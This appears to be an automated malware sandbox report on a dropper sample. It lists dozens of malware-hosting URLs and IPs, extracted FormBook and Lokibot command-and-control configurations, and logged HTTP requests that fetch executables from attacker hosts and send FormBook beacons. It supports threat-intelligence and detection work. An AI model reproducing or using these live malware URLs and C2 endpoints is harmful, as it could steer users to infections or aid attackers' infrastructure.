                    Source: http://185.225.74.251/mipselAvira URL Cloud: Label: malware
                    Source: http://123.241.15.46:26319/.iAvira URL Cloud: Label: malware
                    Source: http://44.203.122.41/Magic_Stage.ps1Avira URL Cloud: Label: malware
                    Source: https://www.movidoc.com.br/agenzia/Avira URL Cloud: Label: malware
                    Source: http://219.85.163.80:1336/.iAvira URL Cloud: Label: malware
                    Source: http://91.213.50.74/GREEN/ZXC/ZAS/PeF3.txtAvira URL Cloud: Label: malware
                    Source: http://185.254.37.196/bins/sora.sh4Avira URL Cloud: Label: malware
                    Source: http://84.54.50.9:222/PPt-AdobePDFPackageWebster_178950.wsfAvira URL Cloud: Label: malware
                    Source: https://mphasistech.com/ns/Avira URL Cloud: Label: malware
                    Source: http://115.78.133.115:24051/.iAvira URL Cloud: Label: malware
                    Source: http://ircftp.net/image.pngAvira URL Cloud: Label: malware
                    Source: http://95.214.27.15/secured/wp/Order.imgAvira URL Cloud: Label: malware
                    Source: http://217.128.133.5:16093/.iAvira URL Cloud: Label: malware
                    Source: http://111.70.30.138:59492/.iAvira URL Cloud: Label: malware
                    Source: http://200.59.114.69:45994/iAvira URL Cloud: Label: malware
                    Source: http://94.142.138.111/software/bld_4.exeAvira URL Cloud: Label: malware
                    Source: http://85.217.144.143/files/Amadey.exeAvira URL Cloud: Label: malware
                    Source: http://112.186.96.252:17572/.iAvira URL Cloud: Label: malware
                    Source: http://67.160.119.210:38764/.iAvira URL Cloud: Label: malware
                    Source: http://192.53.122.30/arm7Avira URL Cloud: Label: malware
                    Source: http://106.1.184.222:3735/.iAvira URL Cloud: Label: malware
                    Source: http://rapture2.romangrey.net/blastematic/hOyCwvKXsnCg6Amj7v/Avira URL Cloud: Label: malware
                    Source: http://68.147.93.157:41039/.iAvira URL Cloud: Label: malware
                    Source: http://112.162.152.226:23934/.iAvira URL Cloud: Label: malware
                    Source: http://200.161.80.42:21699/.iAvira URL Cloud: Label: malware
                    Source: http://94.156.253.236/adyfriday.vbsAvira URL Cloud: Label: malware
                    Source: https://91.213.50.74/CRYPS/QWERS/MASTERXLS/PeF3New.txtAvira URL Cloud: Label: malware
                    Source: http://178.75.6.127:19698/.iAvira URL Cloud: Label: malware
                    Source: http://95.237.14.243:7717/.iAvira URL Cloud: Label: malware
                    Source: http://www.wzmatics.com/4hc5/www.checktrace.comAvira URL Cloud: Label: malware
                    Source: C:\Users\user\Desktop\a\autolog.exeAvira: detection malicious, Label: HEUR/AGEN.1337943
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeAvira: detection malicious, Label: HEUR/AGEN.1318623
                    Source: C:\Users\user\Desktop\a\kung.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
                    Source: C:\Users\user\Desktop\a\foto1661.exeAvira: detection malicious, Label: HEUR/AGEN.1318580
                    Source: C:\Users\user\Desktop\a\201.exeAvira: detection malicious, Label: HEUR/AGEN.1304159
                    Source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sarthaksrishticreation.com/sy22/"], "decoy": ["vinteligencia.com", "displayfridges.fun", "completetip.com", "giallozafferrano.com", "jizihao1.com", "mysticheightstrail.com", "fourseasonslb.com", "kjnala.shop", "mosiacwall.com", "vandistreet.com", "gracefullytouchedartistry.com", "hbiwhwr.shop", "mfmz.net", "hrmbrillianz.com", "funwarsztat.com", "polewithcandy.com", "ourrajasthan.com", "wilhouettteamerica.com", "johnnystintshop.com", "asgnelwin.com", "alcmcyu.com", "thwmlohr.click", "gypseascuba.com", "mysonisgaythemovie.com", "sunriseautostorellc.com", "fuhouse.link", "motorcycleglassesshop.com", "vaskaworldairways.com", "qixservice.online", "b2b-scaling.com", "03ss.vip", "trishpintar.com", "gk84.com", "omclaval.com", "emeeycarwash.com", "wb7mnp.com", "kimgj.com", "278809.com", "summitstracecolumbus.com", "dryadai.com", "vistcreative.com", "weoliveorder.com", "kwamitikki.com", "cjk66.online", "travisline.pro", "mercardosupltda.shop", "sunspotplumbing.com", "podplugca.com", "leontellez.com", "fzturf.com", "docomo-mobileconsulting.com", "apneabirmingham.info", "rollesgraciejiujitsu.com", "sx15k.com", "kebobcapital.com", "91967.net", "claudiaduverglas.com", "zhperviepixie.com", "oliwas.xyz", "flowersinspace.tech", "uadmxqby.click", "greatbaitusa.com", "drpenawaraircondhargarahmah.com", "sofbks.top"]}
                    Source: 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "https://sempersim.su/a16/fre.php"]}
                    Source: New_Text_Document.exeReversingLabs: Detection: 50%
                    Source: New_Text_Document.exeVirustotal: Detection: 63%Perma Link
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 15.2.pznhcda.exe.910000.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.sbinzx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.audiodgse.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.pznhcda.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000010.00000002.1373397267.00000000009B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2486958319.0000000004460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2475448854.0000000002560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485022491.00000000044B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1375358332.0000000002B70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1378872385.0000000000D30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2485599667.00000000044E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2491293063.0000000004D90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2475106067.0000000003000000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000025.00000002.2495734545.0000000004EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000014.00000002.2489028637.00000000033E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001D.00000002.2487485733.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.1370772038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000017.00000002.2475619657.00000000028D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1368928520.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1369508767.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000F.00000002.1299234736.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.1287513905.0000000003AEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.1368570053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2490251590.0000000003E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    Source: yektakhodro.comVirustotal: Detection: 5%Perma Link
                    Source: img.proxies.worldVirustotal: Detection: 17%Perma Link
                    Source: www.hotelunivers84.comVirustotal: Detection: 6%Perma Link
                    Source: china.dhabigroup.topVirustotal: Detection: 26%Perma Link
                    Source: kimgj.comVirustotal: Detection: 15%Perma Link
                    Source: collibrishop.onlineVirustotal: Detection: 11%Perma Link
                    Source: h171145.srv22.test-hf.suVirustotal: Detection: 18%Perma Link
                    Source: www.thwmlohr.clickVirustotal: Detection: 12%Perma Link
                    Source: whitecatcorn.comVirustotal: Detection: 7%Perma Link
                    Source: indococoexports.comVirustotal: Detection: 6%Perma Link
                    Source: pathlightpropertiesmgt.comVirustotal: Detection: 13%Perma Link
                    Source: butchane.funVirustotal: Detection: 13%Perma Link
                    Source: www.lpqxmz.siteVirustotal: Detection: 10%Perma Link
                    Source: www.kimgj.comVirustotal: Detection: 13%Perma Link
                    Source: www.viteview.comVirustotal: Detection: 8%Perma Link
                    Source: fresh1.ironoreprod.topVirustotal: Detection: 26%Perma Link
                    Source: www.kjnala.shopVirustotal: Detection: 13%Perma Link
                    Source: www.vaskaworldairways.comVirustotal: Detection: 13%Perma Link
                    Source: www.pathlightpropertiesmgt.comVirustotal: Detection: 8%Perma Link
                    Source: www.tcbbuilds.comVirustotal: Detection: 8%Perma Link
                    Source: www.peakvitality.fitnessVirustotal: Detection: 11%Perma Link
                    Source: www.collibrishop.onlineVirustotal: Detection: 5%Perma Link
                    Source: https://smartphoodapp.com/miner.exeVirustotal: Detection: 16%Perma Link
                    Source: http://94.53.120.109/dusers.exeVirustotal: Detection: 14%Perma Link
                    Source: http://193.42.33.51/simxo.vbsVirustotal: Detection: 11%Perma Link
                    Source: http://216.244.203.134:42107/bin.shVirustotal: Detection: 5%Perma Link
                    Source: http://203.204.235.113:44940/.iVirustotal: Detection: 16%Perma Link
                    Source: http://185.161.248.78/3589a2a406ead5ea/msvcp140.dllVirustotal: Detection: 17%Perma Link
                    Source: http://220.117.35.167:47616/.iVirustotal: Detection: 18%Perma Link
                    Source: http://116.212.142.69:36319/Mozi.mVirustotal: Detection: 22%Perma Link
                    Source: http://211.199.69.236:59418/.iVirustotal: Detection: 18%Perma Link
                    Source: http://211.230.226.111:39603/.iVirustotal: Detection: 16%Perma Link
                    Source: https://uscreditfixers.com/iupd/Virustotal: Detection: 8%Perma Link
                    Source: https://wtools.io/code/dl/bPnOVirustotal: Detection: 16%Perma Link
                    Source: http://41.32.168.51:16133/.iVirustotal: Detection: 16%Perma Link
                    Source: http://201.150.173.84:53974/Mozi.mVirustotal: Detection: 20%Perma Link
                    Source: http://123.241.15.110:56344/.iVirustotal: Detection: 12%Perma Link
                    Source: http://98.227.194.36:11110/.iVirustotal: Detection: 14%Perma Link
                    Source: https://quizbn.com/download/File_pass1234.7zVirustotal: Detection: 17%Perma Link
                    Source: http://109.235.189.104:7992/.iVirustotal: Detection: 17%Perma Link
                    Source: http://61.57.95.40:11177/.iVirustotal: Detection: 15%Perma Link
                    Source: http://176.97.210.211/ppcVirustotal: Detection: 18%Perma Link
                    Source: http://95.214.24.244/TORRENT-SPAM/Kbdxdxwj-1.exeVirustotal: Detection: 18%Perma Link
                    Source: http://182.216.221.251:52881/.iVirustotal: Detection: 15%Perma Link
                    Source: https://vidaviajesperu.com/download/File_pass1234.7zVirustotal: Detection: 16%Perma Link
                    Source: http://182.235.147.107:22649/.iVirustotal: Detection: 15%Perma Link
                    Source: http://64.79.79.180/m68kVirustotal: Detection: 13%Perma Link
                    Source: http://brknarikan.com/upload/Statement000487291018.xlsbVirustotal: Detection: 16%Perma Link
                    Source: http://62.169.235.215:17145/.iVirustotal: Detection: 18%Perma Link
                    Source: https://village-auto.net/sut/Virustotal: Detection: 8%Perma Link
                    Source: http://122.100.175.200:27429/.iVirustotal: Detection: 11%Perma Link
                    Source: http://112.78.42.90:29620/.iVirustotal: Detection: 14%Perma Link
                    Source: http://112.239.99.27:37295/Mozi.mVirustotal: Detection: 5%Perma Link
                    Source: http://181.129.137.29:32770/.iVirustotal: Detection: 15%Perma Link
                    Source: https://trtmyanmar.com/wp-content/plugins/yjmqxmidki/a/hyehwggs.ps1Virustotal: Detection: 11%Perma Link
                    Source: https://khanz.co.nz/ieea/Virustotal: Detection: 15%Perma Link
                    Source: http://88.225.222.128:14802/.iVirustotal: Detection: 15%Perma Link
                    Source: C:\Program Files\Google\Chrome\updater.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\a\201.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\a\audiodgse.exeReversingLabs: Detection: 73%
                    Source: C:\Users\user\Desktop\a\autolog.exeReversingLabs: Detection: 78%
                    Source: C:\Users\user\Desktop\a\davincizx.exeReversingLabs: Detection: 17%
                    Source: C:\Users\user\Desktop\a\kung.exeReversingLabs: Detection: 100%
                    Source: C:\Users\user\Desktop\a\sbinzx.exeReversingLabs: Detection: 22%
                    Source: C:\Users\user\Desktop\a\setup.exeReversingLabs: Detection: 52%
                    Source: C:\Users\user\Desktop\a\audiodgse.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\a\autolog.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\a\tus.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\pznhcda.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\a\davincizx.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\a\kung.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\a\foto1661.exeJoe Sandbox ML: detected
                    Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.7:49709 version: TLS 1.0
                    Source: New_Text_Document.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: New_Text_Document.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: firefox.pdbP source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wextract.pdb source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: poqexec.pdb source: LkeNkIcFYvnikmw.exe, 0000000E.00000003.1295682318.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: poqexec.pdbGCTL source: LkeNkIcFYvnikmw.exe, 0000000E.00000003.1295682318.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: colorcpl.pdbGCTL source: pznhcda.exe, 00000010.00000002.1370743174.0000000000578000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1381201371.0000000002660000.00000040.10000000.00040000.00000000.sdmp
                    Source: Binary string: wextract.pdbGCTL source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: LyoY.pdb source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: colorcpl.pdb source: pznhcda.exe, 00000010.00000002.1370743174.0000000000578000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1381201371.0000000002660000.00000040.10000000.00040000.00000000.sdmp
                    Source: Binary string: LyoY.pdbSHA2565 source: New_Text_Document.exe, 00000000.00000002.2491308945.000000000347B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: LkeNkIcFYvnikmw.exe, 0000000E.00000002.2472980691.00000000004BE000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: setup.exe, 00000013.00000002.1460018567.00007FF7F174E000.00000040.00000001.01000000.00000012.sdmp
                    Source: Binary string: wntdll.pdbUGP source: audiodgse.exe, 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1294737365.0000000002180000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1287410066.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.0000000000B7E000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1296909656.000000000067F000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1299034162.000000000082C000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1361757763.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.00000000050CE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1372810820.0000000004D81000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000002.2488003527.0000000004780000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000003.1348193628.00000000043AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: audiodgse.exe, audiodgse.exe, 00000008.00000002.1372343268.0000000001230000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1294737365.0000000002180000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 0000000F.00000003.1287410066.000000001D0B0000.00000004.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.0000000000B7E000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1296909656.000000000067F000.00000004.00000020.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000002.1373706640.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, pznhcda.exe, 00000010.00000003.1299034162.000000000082C000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1361757763.0000000004BD5000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000002.2492079854.00000000050CE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1372810820.0000000004D81000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000002.2488003527.0000000004780000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000017.00000003.1348193628.00000000043AD000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: RAServer.pdb source: audiodgse.exe, 00000008.00000002.1370169341.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1375353577.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1374176668.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000003.1296076993.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000002.2484721379.0000000000D04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb source: setup.exe, 00000013.00000002.1460018567.00007FF7F174E000.00000040.00000001.01000000.00000012.sdmp
                    Source: Binary string: RAServer.pdbGCTL source: audiodgse.exe, 00000008.00000002.1370169341.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1375353577.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, sbinzx.exe, 00000009.00000002.1374176668.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000003.1296076993.0000000000CEB000.00000004.00000020.00020000.00000000.sdmp, LkeNkIcFYvnikmw.exe, 0000000E.00000002.2484721379.0000000000D04000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: firefox.pdb source: raserver.exe, 00000014.00000003.1558158883.0000000007CCE000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000014.00000003.1609490585.0000000008361000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\a\sbinzx.exeCode function: 4x nop then pop ebx9_2_00407B1C

                    Networking

                    barindex
                    Source: C:\Windows\explorer.exeNetwork Connect: 99.83.196.71 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 50.116.112.43 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 71.33.141.248 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 103.120.80.111 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 43.154.67.170 80Jump to behavior
                    Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
                    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49723 -> 50.116.112.43:80
                    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49731 -> 71.33.141.248:80
                    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49734 -> 103.120.80.111:80
                    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49739 -> 99.83.196.71:80
                    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49741 -> 23.227.38.74:80
                    Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.7:49748 -> 3.33.130.190:80
                    Source: TrafficSnort IDS: 2018572 ET TROJAN HTTP Executable Download from suspicious domain with direct request/fake browser (multiple families) 91.227.16.22:80 -> 192.168.2.7:49755
                    Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer Related (MC-NMF Authorization) 192.168.2.7:49758 -> 77.91.124.86:19084
                    Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49758 -> 77.91.124.86:19084
                    Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 77.91.124.86:19084 -> 192.168.2.7:49758
                    Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                    Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                    Source: Malware configuration extractorURLs: https://sempersim.su/a16/fre.php
                    Source: Malware configuration extractorURLs: www.sarthaksrishticreation.com/sy22/
                    Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                    Source: global trafficHTTP traffic detected: GET /attachments/1162840103530528921/1164891114868834355/setup.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1536/audiodgse.exe HTTP/1.1Host: 172.245.208.6Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /_errorpages/sbinzx.exe HTTP/1.1Host: china.dhabigroup.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /2310/autolog.exe HTTP/1.1Host: 141.98.10.13Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /4hc5/?r6=GXbDJDJhjTGXq&MTEHTJO=s9Ra+if2WlaNsoBK6FAVDIm3PM9kdSAO890q2GWpqr1TmLV8KIiXeSy1Z3RqZFGmH5Rhc9k1ZdI= HTTP/1.1Host: www.collibrishop.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /sy22/?if=0xwPlKBJmvJUqodgY9f+IWv5xvicy/R8pafAMB3XVbynRWwk7/Bvj4DEfhLDhKqwHFmlVA2z3A==&cb=VTR8Df4xbZcXrNY HTTP/1.1Host: www.vaskaworldairways.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /4hc5/?MTEHTJO=245SFh8UPM+emiRbepq1WQd5insBsLuTd6ZIn28ambGSnd6jNl4HEv69lJWy4XCsbMyZfqZpfnM=&r6=GXbDJDJhjTGXq HTTP/1.1Host: www.lpqxmz.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /sy22/?if=3SPsA2Tf94mqV9E1IvWjnvopZUchcaiATfn50pDV0DZ5J8a0fl4ILxGtqicvHDFESWm4a48lbA==&cb=VTR8Df4xbZcXrNY HTTP/1.1Host: www.kimgj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /sy22/?if=3SPsA2Tf94mqV9E1IvWjnvopZUchcaiATfn50pDV0DZ5J8a0fl4ILxGtqicvHDFESWm4a48lbA==&cb=VTR8Df4xbZcXrNY HTTP/1.1Host: www.kimgj.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /4hc5/?r6=GXbDJDJhjTGXq&MTEHTJO=W/W+8rZCJQfv83X5eCtYm4GP2nwQEt1BrOeVIr8pBa3hcSl80fMsJcdXq0PVoYjeeMsKfkenNDs= HTTP/1.1Host: www.peakvitality.fitnessConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /4hc5/?MTEHTJO=0xuAZqoZxaytpPPw7QG2WMtYamztVFoql+VmrFv+pApcfkXOBXNNhM5EbinmjYLQWWA1X0ExQok=&r6=GXbDJDJhjTGXq HTTP/1.1Host: www.pathlightpropertiesmgt.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
                    Source: global trafficHTTP traffic detected: GET /_errorpages/davincizx.exe HTTP/1.1Host: fresh1.ironoreprod.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /fuza/foto1661.exe HTTP/1.1Host: 77.91.68.249Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /fuza/tus.exe HTTP/1.1Host: 77.91.68.249Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /201.exe HTTP/1.1Host: h171145.srv22.test-hf.suConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /satup/kung.exe HTTP/1.1Host: 103.39.124.209Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /S2210M/smss.exe HTTP/1.1Host: 103.72.68.128Connection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /_errorpages/sbin22zx.exe HTTP/1.1Host: china.dhabigroup.topConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 26 Oct 2023 07:45:52 GMTServer: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17Last-Modified: Tue, 24 Oct 2023 20:22:11 GMTETag: "a7600-6087c17f962d8"Accept-Ranges: bytesContent-Length: 685568Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 73 27 38 65 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 6c 0a 00 00 08 00 00 00 00 00 00 16 8b 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c2 8a 0a 00 4f 00 00 00 00 a0 0a 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 b8 5d 0a 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1c 6b 0a 00 00 20 00 00 00 6c 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 a0 0a 00 00 06 00 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 